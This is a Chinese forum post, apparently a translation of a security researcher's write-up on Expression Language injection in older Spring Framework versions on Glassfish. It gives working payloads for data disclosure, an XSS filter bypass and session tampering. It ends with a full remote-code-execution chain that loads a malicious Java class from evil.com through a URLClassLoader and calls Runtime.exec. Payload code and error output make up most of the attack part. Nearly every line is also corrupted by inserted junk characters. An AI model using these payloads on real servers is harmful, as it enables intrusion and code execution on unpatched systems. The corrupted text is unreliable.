Remote Code with& M. K5 z! i5 a2 ^& c0 B
Expression Language Injection+ |' b$ B/ A* `$ Z; e" W
Spring Framework脆弱性—DanAmodio# m' G! e6 d& W/ ^ W- s3 C3 A
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
# U) l% H2 r; o8 M: J可能会存在风险。
% `+ X. J6 _ X0 @: @% y在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的4 J( a6 r( L! x2 i+ J6 I
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可9 n5 h+ ^8 E1 l5 A& C
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
& {0 Q! F6 J+ \/ s3 I% M2 {2 k7 x以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
4 C1 U5 n* F6 a2 C5 `版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
, B$ ]& `, ^; G0 y由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但1 Q* ]( e% H8 a; r' }- x9 Z5 c
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版( |4 K) q1 ?$ L8 Q. c& m2 @ P
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。6 d. @' z* T7 t, C
这些版本不支持禁用double EL resolution.
8 _9 j1 c9 ?+ y4 P' h* x# Q; I3 l这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含8 i' Z7 \$ h8 H$ k: A% ?* n' M) g
EL2.2容器上可能进行远程代码执行。3 |4 W$ |; t4 I; O* B0 h. `' u8 {
这是一个原始信息泄露的攻击例子:6 |3 F+ H% E: @1 u% N7 O4 w
请求: [; ^; ~6 N5 a1 p/ z% n: o
ttp://vulnerable.com/foo?message=${applicationScope}+ F J9 _7 y9 T; F. J5 p& ?5 ^( W
到达以下内容页面:$ S0 b* ^" }+ S8 i/ _, S+ D" \
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
' s$ W. W6 q: M3 l' y5 o, x4 _你也可以做一些其他事情,如这样:3 p0 g. o" P6 ~; Z- u V; H
${9999+1}
4 H4 H o* ~- r0 V* n还可以访问session 对象和beans. D* T3 w# a8 m3 ?+ Q5 V& P1 u
${employee.lastName} }+ g" s. I, s4 U4 d2 e1 @
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
3 \$ o( q( T/ Z( D8 B' p& oEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
( d' }- N# M4 d6 q西,比如XSS.
/ Z( u/ u' e9 D+ k" u, I/ K& X( A哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签& [. \) [7 a% o! i) e- }
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
/ l5 ~0 p3 { S, T呢?”1 @/ w! Y; v- f: @$ \; J
因此,我尝试巳缦拢�
5 i" k8 ^' P4 B0 M+ b' ~( Rhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
& v) j0 Z/ T) X/ g, ?$ u& ~# bP
3 J! r8 @2 n) Q. i我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
! x7 a! D% d1 s+ k回的文本被插入进了spring:message 标签。; U8 M0 k! r2 o
这里是一个最终绕过过滤的实例:
3 s2 w2 y9 k, t# {7 |0 [6 y% \; Chttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ" b4 E3 r2 F0 G3 K1 F3 b2 @! n
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
; i+ s9 m) N/ \. V7 [6 @4 Q什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
. Q: P: A& s7 o$ r% O: s# f经过一番研究,我学习到EL2.2 增加了方法调用。
# i# v0 m& r+ F, v! g: X我写了一个快速测试应用程序代码并且检测一些功能1 n# p% R- y* L8 k) [2 A
${pageContext.request.getSession().setAttribute(“account”,”123456″)}& @9 r" c/ j. B/ l0 \ J
${pageContext.request.getSession().setAttribute(“admin”,true)}
: _5 `! B* N5 l+ l' s2 t3 [+ a好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的8 p3 |. k# G& U# w/ [7 l
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
) H2 N. P y( o% T${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
& U i% G& E! X2 _% k w, G( J“, 1234)}7 d& C R3 a4 F
${“”.getClass().forName(“java.lang.Runtime”)}( U7 J& s( S8 L
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不+ L r1 [0 Q/ r9 m- |
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函- |0 a6 h3 `1 M$ k/ A* k
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有4 s4 c/ }- X$ l" d$ G e. u, |0 [
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于/ l8 a, q8 k% i5 {
方法签名invoke(Object obj, Object„ args)! b2 ~2 d+ O* n4 J* x; V; D5 w
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
; ^! f2 g$ o, L7 J( s题,以让它可以工作起来。+ y+ X( _( W2 W c( K
漏洞利用:0 e I1 F) Y; {; j6 `
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我7 W- a1 j' C. y c& R& O9 n6 s
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
) U6 f+ i0 ? l3 l6 w8 t这里有一些我试过的失败的用例,为了试图让它工作的用例:3 k; K8 m5 j# G, y8 N' A8 D$ ^6 B$ i
写文件到文件系统; M$ b v6 w) L% z/ o( L3 @
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
$ A& j- h* P1 ^ M# H& T8 l p5 V我认为这些可以很好的工作,但是我不能找到合适的类来载入。
7 G, h4 G1 J$ N${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}% k$ d1 K" _* r
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:, m. J2 o; ]: v* a% }
org.springframework.expression.spel.standard.SpelExpressionParser not found
i: J+ q; F) u4 q: t4 m. c0 @by) \/ r) j- l- Q7 R% y" Y
org.glassfish.web.javax.servlet.jsp [194].
& t$ e) i1 S8 \' E4 f 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public g& z( Y' ~! z5 U$ a1 \: x
利用反射来创建一个新的Runtime(and watch the world burn)
* s6 a/ }, F2 ]; e' e5 N) {- i) w${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName3 J$ M2 i) i: j- r
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}6 t5 G3 f3 I3 } ?" w6 z0 E
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}# V2 o0 a% u2 P
使用java.lang.ProcessBuilder
9 C: H" H8 v1 o H 用表达式语言来评估表达式语言
S9 Y w$ Z% n+ X8 G- KExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
- C; o/ o8 F' T- ] M${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
' V5 U# Y* ^; s' |7 ?& A J' X“,”".getClass(),null)}! Q, ?1 M6 ?4 t I
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)' v/ F: s2 w" o l: r6 p; i
我在使用一个空数组通过Method.invoke()时失败了很多次! x- E4 _! n0 q
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
" ^# [; P9 `8 d; r.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
# N' y, Q, Z( h* irrayList”).newInstance().toArray())
% Y4 F( g$ }) _java.lang.IllegalArgumentException: wrong number of arguments
3 v }( M, T2 Y: I9 w: Q! u) D最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
/ z; c" x9 }2 x2 |3 e. j以创建一个恶意class文件并且指向类装载器.
( c/ ?. }* T5 b$ C u j1 C我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:5 ~% A i7 M, ]8 F' V/ _& V
public class Malicious {
g. T; j" N5 i! x7 m dpublic Malicious() {
/ v9 H% F7 i- m. J. Z2 o+ ^try {& `: f- P1 L7 m- l) m
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac2 u- X1 U0 c5 w2 `
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
0 [( i/ p- h/ P! Q5 t} catch (Exception e) {' z7 |5 c* ? p. {2 H
}
( u; _+ E% C {. J6 Y# b5 {}* G1 K; |! e0 r. D; \
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
) U: E" f3 G. N, z话中,因此它可以被使用./ y. s: {% J. @! b3 ]1 |. l
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName Q' H/ ]$ y: M
(“java.util.ArrayList”).newInstance())}
7 T2 x8 j$ q7 c) Y& KURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建8 ^; D) _8 _% f- O2 z" M
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
( C1 B& v u$ z3 ^5 C2 U0 KgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
% K- b; Q% {7 C我们可以调用的create(string)方法,然后转换对一个URL对象。1 a; }- I( L/ Z: A r
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh6 G% p9 d3 _, Y/ |
ere/malicious/classfile/is/located/”).toURL())}
# G, ~" j; N+ _! ^" j( c7 A7 {( `然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,; ~$ S1 c1 _, k
恶意类文件被装载并创建,触发远程代码.
& Y$ G( V: m% O& ^8 N l${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
$ q- n4 o5 j- x0 u: Pxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().. [2 g- k2 o2 U
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance6 p9 x4 E( Z$ K5 C% \5 Z9 Z
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对